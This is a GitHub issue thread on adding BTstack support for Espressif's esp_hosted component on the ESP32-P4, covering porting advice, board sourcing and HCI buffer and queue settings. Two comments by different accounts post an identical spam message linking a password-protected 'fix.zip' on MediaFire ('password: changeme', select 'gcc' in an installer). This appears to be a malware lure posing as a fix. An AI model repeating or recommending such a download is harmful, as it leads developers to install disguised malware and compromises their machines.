bluekitchen/btstack #625: Add support for esp_hosted

AndyDevLat, 2024-08-26:
It would be good to add support for esp_hosted component in ESP-IDF used by new ESP32-P4 SoC from Espessif. This chip has no onboard radios, but esp_hosted is designed to forward HCI requests to other chip via SPI/SDIO transport.
Current ESP32 port of BtStack uses VHCI requests, so it cannot work as is.
But I tried to modify btstack_port_esp32.c and replace VHCI calls with calls to esp_hosted component.
Also esp_hosted component had to be slightly changed, so i could forward packets received from SPI/SDIO transport to BtStack main thread, as if they came from VHCI.
I have reported this issue here and they also asked to notify BtStack developers about this:
https://github.com/espressif/esp-hosted/issues/464
My current solution seems to work, but it needs more testing. Maybe there is some more elegant solution though.

Wanderx13, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

WSA1k, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

mringwal, 2024-08-30:
Hi @AndyDevLat Thanks for reporting. 

The esp32 port so far has only targeted the version with internal virtual HCI interface and most porting has ended up in btstack_port_esp32.c.

For use on the ESP32-P4, the hci_transport_t interface that currently uses VHCI should be replaced, e.g. separate file or put in some #ifdef guard, and a new implementation that uses the new 'esp_hosted' component. 

What did you need to change in esp-hosted? BTstack's transport interface is intended to be as flexible as possible.

Btw. looks like the ESP32-P4-Function-EV-Board would be useful to test this. Where did you get yours? Google suggests that the best options is AliExpress currently.

AndyDevLat, 2024-08-30:
Thank you for reply! Yes, i got ESP32-P4-Function-EV-Board on Aliexpress from official Espressif store.
https://www.aliexpress.com/item/1005007259059322.html?gps-id=pcStoreJustForYou&scm=1007.23125.137358.0&scm_id=1007.23125.137358.0&scm-url=1007.23125.137358.0&pvid=e3a9b309-9fec-400c-a766-7c716c697ba6&_t=gps-id:pcStoreJustForYou,scm-url:1007.23125.137358.0,pvid:e3a9b309-9fec-400c-a766-7c716c697ba6,tpp_buckets:668%232846%238108%231977&pdp_npi=4%40dis%21EUR%2164.64%2163.99%21%21%2169.90%2169.20%21%40211b65d417250193312015327ede9d%2112000039974972005%21rec%21LV%214090118565%21X&spm=a2g0o.store_pc_home.smartJustForYou_2009554946974.1005007259059322

It will be enough for you to make some testing as it has also ESP32-C6 connected to ESP32-P4 via SDIO interface. But it supports BLE only.
For my project i need BT Classic, so i hooked to it my ESP32-PICO-DevKitM-2 via SPI.
>What did you need to change in esp-hosted?

Only some minor stuff.
You can see more details here: 
https://github.com/espressif/esp-hosted/issues/464.
And on BtStack side i have adjusted btstack_port_esp32.c via ifdefs as you mentioned.
I can post you parts my code with all needed modifications if you are interested

mringwal, 2024-08-30:
Thanks for the additional details. I've ordered the P4 and hope that I can have a look into this when it arrives in two weeks or so (busy in other areas at the moment. And yes, using a ESP32 for Dual-Mode Bluetooth looks like a good idea (you could use any other Bluetooth Controller with UART as well, but the ESP32 is cost-effective and you don't need additional UART pins)

AndyDevLat, 2024-08-30:
Yes, and i like that idea more than UART because it provides minimal latency for packet latency between controller and main BtStack thread: SDIO/SPI is magnitudes faster. The  fact we don't need UART pins is just a bonus.;)

AndyDevLat, 2024-08-30:
Btw, there is one thing  i have changed in btstack_config.h too.
Originally it had
#define HCI_ACL_PAYLOAD_SIZE (1691 + 4)
But i have changed it to 1024 (same as HCI_HOST_ACL_PACKET_LEN) as i don't use BNEP/PAN and i guess 1024 is enough.
I did this because maximum packet size of over SPI on esp_hosted is 1600 bytes.  They have such definitions:
#define MAX_SPI_BUFFER_SIZE               1600
/* TODO: SDIO buffers to be set same at both, ESP and host side */
#define MAX_SDIO_BUFFER_SIZE              1536
#define MAX_SPI_HD_BUFFER_SIZE            1600

So you should be careful and I decided to be on the safe side and reduced it.  So if you need 1695 bytes indeed then maybe need kindly ask them to increase these values.

Also i have set
#define HCI_HOST_ACL_PACKET_NUM 10
Originally it was 20.  But esp_hosted has default queue depth of 20 too and it is shared with WiFi packets as well. I could increase it to to 30 or 40 maybe, but I decided 10 is enough for my purposes for now.
Maybe will adjust it later after testing.